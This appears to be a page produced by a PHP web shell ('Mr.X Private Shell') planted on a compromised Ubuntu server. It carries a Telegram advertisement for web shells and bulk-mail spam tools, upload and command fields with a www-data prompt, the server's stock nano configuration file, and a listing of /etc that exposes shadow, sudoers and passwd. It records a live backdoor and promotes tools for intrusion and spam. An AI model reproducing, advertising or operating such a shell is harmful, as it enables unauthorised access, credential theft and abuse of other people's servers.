__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
## Sample initialization file for GNU nano.
##
## For the options that take parameters, the default value is shown.
## Other options are unset by default.  To make sure that an option
## is disabled, you can use "unset <option>".
##
## Characters that are special in a shell should not be escaped here.
## Inside string parameters, quotes should not be escaped -- the last
## double quote on the line will be seen as the closing quote.

## Make 'nextword' (Ctrl+Right) and 'chopwordright' (Ctrl+Delete)
## stop at word ends instead of at beginnings.
# set afterends

## When soft line wrapping is enabled, make it wrap lines at blanks
## (tabs and spaces) instead of always at the edge of the screen.
# set atblanks

## Automatically indent a newly created line to the same number of
## tabs and/or spaces as the preceding line -- or as the next line
## if the preceding line is the beginning of a paragraph.
# set autoindent

## Back up files to the current filename plus a tilde.
# set backup

## The directory to put unique backup files in.
# set backupdir ""

## Use bold text instead of reverse video text.
# set boldtext

## Treat any line with leading whitespace as the beginning of a paragraph.
# set bookstyle

## The characters treated as closing brackets when justifying paragraphs.
## This may not include any blank characters.  Only closing punctuation,
## optionally followed by these closing brackets, can end sentences.
# set brackets ""')>]}"

## Automatically hard-wrap the current line when it becomes overlong.
# set breaklonglines

## Do case-sensitive searches by default.
# set casesensitive

## Constantly display the cursor position in the status bar or minibar.
# set constantshow

## Use cut-from-cursor-to-end-of-line by default.
# set cutfromcursor

## Do not use the line below the title bar, leaving it entirely blank.
# set emptyline

## Set the target width for automatic hard-wrapping and for justifying
## paragraphs.  If the specified value is 0 or less, the wrapping point
## will be the terminal's width minus this number.
# set fill -8

## Draw a vertical stripe at the given column, to help judge text width.
## (This option does not have a default value.)
# set guidestripe 75

## Remember the used search/replace strings for the next session.
set historylog

## Display a "scrollbar" on the righthand side of the edit window.
# set indicator

## Scroll the buffer contents per half-screen instead of per line.
# set jumpyscrolling

## Display line numbers to the left (and any anchors in the margin).
# set linenumbers

## Enable vim-style lock-files.  This is just to let a vim user know you
## are editing a file [s]he is trying to edit and vice versa.  There are
## no plans to implement vim-style undo state in these files.
set locking

## Fall back to slow libmagic to try and determine an applicable syntax.
# set magic

## The opening and closing brackets that are found by a matching-bracket
## search.  This may not contain blank characters.  The opening brackets
## must come before the closing ones, and they must be in the same order.
# set matchbrackets "(<[{)>]}"

## Suppress the title bar and show the filename plus a cursor-position
## percentage in the space of the status bar.
# set minibar

## Enable mouse support, if available for your system.  When enabled,
## mouse clicks can be used to place the cursor, set the mark (with a
## double click), and execute shortcuts.  The mouse will work in the
## X Window System, and on the console when gpm is running.
# set mouse

## Switch on multiple file buffers (inserting a file will put it into
## a separate buffer).
# set multibuffer

## Don't convert files from DOS/Mac format.
# set noconvert

## Don't display the helpful shortcut lists at the bottom of the screen.
# set nohelp

## Don't automatically add a newline when a file does not end with one.
# set nonewlines

## Set operating directory.  nano will not read or write files outside
## this directory and its subdirectories.  Also, the current directory
## is changed to here, so any files are inserted from this dir.  A blank
## string means the operating-directory feature is turned off.
# set operatingdir ""

## Remember the cursor position in each file for the next editing session.
# set positionlog

## Preserve the XON and XOFF keys (^Q and ^S).
# set preserve

## The characters treated as closing punctuation when justifying paragraphs.
## This may not contain blank characters.  Only these closing punctuations,
## optionally followed by closing brackets, can end sentences.
# set punct "!.?"

## Make status-bar messages disappear after 1 keystroke instead of after 20.
# set quickblank

## The regular expression that matches quoting characters in email
## or line-comment introducers in source code.  The default is:
# set quotestr "^([ 	]*([!#%:;>|}]|//))+"

## Try to work around a mismatching terminfo terminal description.
# set rawsequences

## Fix Backspace/Delete confusion problem.
# set rebinddelete

## Do regular-expression searches by default.
## Regular expressions are of the extended type (ERE).
# set regexp

## Save a changed buffer automatically on exit; don't prompt.
# set saveonexit

## Put the cursor on the highlighted item in the file browser, and
## show the cursor in the help viewer; useful for people who use a
## braille display and people with poor vision.
# set showcursor

## Make the Home key smarter: when Home is pressed anywhere but at the
## very beginning of non-whitespace characters on a line, the cursor
## will jump to that beginning (either forwards or backwards).  If the
## cursor is already at that position, it will jump to the true start
## of the line (the left edge).
# set smarthome

## Spread overlong lines over multiple screen lines.
# set softwrap

## Use this spelling checker instead of the internal one.  This option
## does not have a default value.
# set speller "aspell -x -c"

## Use the end of the title bar for some state flags: I = auto-indenting,
## M = mark, L = hard-wrapping long lines, R = recording, S = soft-wrapping.
set stateflags

## Use this tab size instead of the default; it must be greater than 0.
# set tabsize 8

## Convert each typed tab to the fitting number of spaces.
# set tabstospaces

## Snip whitespace at the end of lines when justifying or hard-wrapping.
# set trimblanks

## Save files by default in Unix format (also when they were DOS or Mac).
# set unix

## The two single-column characters used to display the first characters
## of tabs and spaces.  187 in ISO 8859-1 (0000BB in Unicode) and 183 in
## ISO-8859-1 (0000B7 in Unicode) seem to be good values for these.
## The default when in a UTF-8 locale:
# set whitespace "»·"
## The default otherwise:
# set whitespace ">."

## Detect word boundaries differently by treating punctuation
## characters as parts of words.
# set wordbounds

## The characters (besides alphanumeric ones) that should be considered
## as parts of words.  This option does not have a default value.  When
## set, it overrides option 'set wordbounds'.
# set wordchars "<_>."

## Let an unmodified Backspace or Delete erase the marked region (instead
## of a single character, and without affecting the cutbuffer).
# set zap

## Hide the bars plus help lines and use the whole terminal as edit area.
# set zero


## Paint the interface elements of nano.  These are examples; there are
## no colors by default, except for errorcolor and spotlightcolor.
# set titlecolor bold,white,blue
# set promptcolor lightwhite,grey
# set statuscolor bold,white,green
# set errorcolor bold,white,red
# set spotlightcolor black,lightyellow
# set selectedcolor lightwhite,magenta
# set stripecolor ,yellow
# set scrollercolor cyan
# set numbercolor cyan
# set keycolor cyan
# set functioncolor green

## In root's .nanorc you might want to use:
# set titlecolor bold,white,magenta
# set promptcolor black,yellow
# set statuscolor bold,white,magenta
# set errorcolor bold,white,red
# set spotlightcolor black,orange
# set selectedcolor lightwhite,cyan
# set stripecolor ,yellow
# set scrollercolor magenta
# set numbercolor magenta
# set keycolor lightmagenta
# set functioncolor magenta


## === Syntax coloring ===
## For all details, see 'man nanorc', section SYNTAX HIGHLIGHTING.

## To include most of the existing syntax definitions, you can do:
include "/usr/share/nano/*.nanorc"

## Or you can select just the ones you need.  For example:
# include "/usr/share/nano/html.nanorc"
# include "/usr/share/nano/python.nanorc"
# include "/usr/share/nano/sh.nanorc"

## In /usr/share/nano/extra/ you can find some syntaxes that are
## specific for certain distros or for some less common languages.


## If <Tab> should always produce four spaces when editing a Python file,
## independent of the settings of 'tabsize' and 'tabstospaces':
# extendsyntax python tabgives "    "

## If <Tab> should always produce an actual TAB when editing a Makefile:
# extendsyntax makefile tabgives "	"


## === Key bindings ===
## For all details, see 'man nanorc', section REBINDING KEYS.

## If you want to suspend nano with one keystroke (instead of with ^T^Z):
# bind ^Z suspend main

## The <Ctrl+Delete> keystroke deletes the word to the right of the cursor.
## On some terminals the <Ctrl+Backspace> keystroke produces ^H, which is
## the ASCII character for backspace, so it is bound by default to the
## backspace function.  The <Backspace> key itself produces a different
## keycode, which is hard-bound to the backspace function.  So, if you
## normally use <Backspace> for backspacing and not ^H, you can make
## <Ctrl+Backspace> delete the word to the left of the cursor with:
# bind ^H chopwordleft main

## For a more mnemonic Comment keystroke (overriding Cut-from-cursor):
# bind M-K comment main

## If you want ^L to just refresh the screen and not center the cursor:
# bind ^L refresh main

## When you sometimes type M-J instead of M-K, or M-T instead of M-R:
# unbind M-J main
# unbind M-T main
## (Those functions are still accessible through ^T^J and ^T^V.)

## For quickly uppercasing or lowercasing the word under or after the cursor.
## (These effectively select a word and pipe it through a sed command.)
#bind Sh-M-U "{nextword}{mark}{prevword}{execute}|sed 's/.*/\U&/'{enter}" main
#bind Sh-M-L "{nextword}{mark}{prevword}{execute}|sed 's/.*/\L&/'{enter}" main

## For copying a marked region to the system clipboard:
# bind Sh-M-T "{execute}|xsel -ib{enter}{undo}" main

## For snipping trailing blanks when you save a file:
# bind ^S "{execute}| sed 's/\s\+$//' {enter}{savefile}" main

## If you would like nano to have keybindings that are more "usual",
## such as ^O for Open, ^F for Find, ^H for Help, and ^Q for Quit,
## then uncomment these:
#bind ^X cut main
#bind ^C copy main
#bind ^V paste all
#bind ^Q exit all
#bind ^S savefile main
#bind ^W writeout main
#bind ^O insert main
#set multibuffer
#bind ^H help all
#bind ^H exit help
#bind ^F whereis all
#bind ^G findnext all
#bind ^B wherewas all
#bind ^D findprevious all
#bind ^R replace main
#unbind ^U all
#unbind ^N main
#unbind ^Y all
#unbind M-J main
#unbind M-T main
#bind ^A mark main
#bind ^P location main
#bind ^T gotoline main
#bind ^T gotodir browser
#bind ^T cutrestoffile execute
#bind ^L linter execute
#bind ^E execute main
#bind ^K "{mark}{end}{zap}" main
#bind ^U "{mark}{home}{zap}" main
#bind ^Z undo main
#bind ^Y redo main

Filemanager

Name Type Size Permission Actions
ImageMagick-6 Folder 0755
ModemManager Folder 0755
PackageKit Folder 0755
UPower Folder 0755
X11 Folder 0755
alternatives Folder 0755
apache2 Folder 0755
apparmor Folder 0755
apparmor.d Folder 0755
apport Folder 0755
apt Folder 0755
avahi Folder 0755
bash_completion.d Folder 0755
bind Folder 2755
binfmt.d Folder 0755
byobu Folder 0755
ca-certificates Folder 0755
console-setup Folder 0755
credstore Folder 0700
credstore.encrypted Folder 0700
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cron.yearly Folder 0755
cryptsetup-initramfs Folder 0755
dbconfig-common Folder 0755
dbus-1 Folder 0755
default Folder 0755
depmod.d Folder 0755
dhcp Folder 0755
dpkg Folder 0755
fail2ban Folder 0755
fonts Folder 0755
fwupd Folder 0755
ghostscript Folder 0755
gnutls Folder 0755
groff Folder 0755
grub.d Folder 0755
gss Folder 0755
init.d Folder 0755
initramfs-tools Folder 0755
insserv.conf.d Folder 0755
iproute2 Folder 0755
iptables Folder 0755
iscsi Folder 0755
kernel Folder 0755
landscape Folder 0775
ld.so.conf.d Folder 0755
ldap Folder 0755
letsencrypt Folder 0755
libblockdev Folder 0755
libibverbs.d Folder 0755
libnl-3 Folder 0755
libpaper.d Folder 0755
lighttpd Folder 0755
logcheck Folder 0755
logrotate.d Folder 0755
lvm Folder 0755
mdadm Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
monit Folder 0755
multipath Folder 0700
mysql Folder 0755
needrestart Folder 0755
netplan Folder 0755
network Folder 0755
networkd-dispatcher Folder 0755
newt Folder 0755
opt Folder 0755
pam.d Folder 0755
perl Folder 0755
php Folder 0755
phpmyadmin Folder 0755
pki Folder 0755
plymouth Folder 0755
pm Folder 0755
polkit-1 Folder 0755
pollinate Folder 0755
ppp Folder 0755
profile.d Folder 0755
python3 Folder 0755
python3.12 Folder 0755
rc0.d Folder 0755
rc1.d Folder 0755
rc2.d Folder 0755
rc3.d Folder 0755
rc4.d Folder 0755
rc5.d Folder 0755
rc6.d Folder 0755
rcS.d Folder 0755
rsyslog.d Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
sgml Folder 0755
skel Folder 0755
sos Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0755
supercat Folder 0755
sysctl.d Folder 0755
sysstat Folder 0755
systemd Folder 0755
terminfo Folder 0755
thermald Folder 0755
tmpfiles.d Folder 0755
ubuntu-advantage Folder 0755
udev Folder 0755
udisks2 Folder 0755
ufw Folder 0755
update-manager Folder 0755
update-motd.d Folder 0755
update-notifier Folder 0755
usb_modeswitch.d Folder 0755
vim Folder 0755
vmware-tools Folder 0755
w3m Folder 0755
webalizer Folder 0755
xdg Folder 0755
xml Folder 0755
.pwd.lock File 0 B 0600
.resolv.conf.systemd-resolved.bak File 648 B 0644
.updated File 208 B 0644
adduser.conf File 3.36 KB 0644
bash.bashrc File 2.26 KB 0644
bash_completion File 45 B 0644
bindresvport.blacklist File 367 B 0644
ca-certificates.conf File 6.14 KB 0644
crontab File 1.65 KB 0644
crypttab File 54 B 0644
debconf.conf File 2.9 KB 0644
debian_version File 11 B 0644
deluser.conf File 1.67 KB 0644
dhcpcd.conf File 1.4 KB 0644
e2scrub.conf File 685 B 0644
environment File 106 B 0644
ethertypes File 1.81 KB 0644
fstab File 737 B 0644
fuse.conf File 694 B 0644
gai.conf File 2.52 KB 0644
group File 797 B 0644
group- File 784 B 0644
gshadow File 669 B 0640
gshadow- File 659 B 0640
hdparm.conf File 4.33 KB 0644
host.conf File 92 B 0644
hostname File 4 B 0644
hosts File 256 B 0644
hosts.allow File 411 B 0644
hosts.deny File 711 B 0644
inputrc File 1.83 KB 0644
issue File 26 B 0644
issue.net File 19 B 0644
ld.so.cache File 32.55 KB 0644
ld.so.conf File 34 B 0644
legal File 267 B 0644
libaudit.conf File 191 B 0644
locale.alias File 2.93 KB 0644
locale.conf File 17 B 0644
locale.gen File 9.34 KB 0644
localtime File 1.41 KB 0644
login.defs File 12.06 KB 0644
logrotate.conf File 586 B 0644
lsb-release File 104 B 0644
machine-id File 33 B 0444
magic File 111 B 0644
magic.mime File 111 B 0644
manpath.config File 5.11 KB 0644
mime.types File 73.35 KB 0644
mke2fs.conf File 744 B 0644
modules File 212 B 0644
mtab File 0 B 0444
multipath.conf File 41 B 0644
nanorc File 11.16 KB 0644
netconfig File 767 B 0644
networks File 91 B 0644
nftables.conf File 243 B 0755
nsswitch.conf File 526 B 0644
os-release File 400 B 0644
overlayroot.conf File 6.76 KB 0644
pam.conf File 552 B 0644
papersize File 7 B 0644
passwd File 1.85 KB 0644
passwd- File 1.83 KB 0644
profile File 582 B 0644
protocols File 3.07 KB 0644
resolv.conf File 920 B 0644
rmt File 54.71 KB 0755
rpc File 911 B 0644
rsyslog.conf File 1.18 KB 0644
screenrc File 3.58 KB 0644
sensors3.conf File 10.34 KB 0644
services File 12.51 KB 0644
shadow File 968 B 0640
shadow- File 948 B 0640
shells File 148 B 0644
subgid File 0 B 0644
subgid- File 20 B 0644
subuid File 0 B 0644
subuid- File 20 B 0644
sudo.conf File 4.24 KB 0644
sudo_logsrvd.conf File 9.57 KB 0644
sudoers File 1.76 KB 0440
sysctl.conf File 2.16 KB 0644
timezone File 18 B 0644
ucf.conf File 1.23 KB 0644
uolversion File 3 B 0644
usb_modeswitch.conf File 1.49 KB 0644
vconsole.conf File 150 B 0644
vtrgb File 158 B 0644
wgetrc File 4.83 KB 0644
xattr.conf File 681 B 0644
zsh_command_not_found File 460 B 0644
Filemanager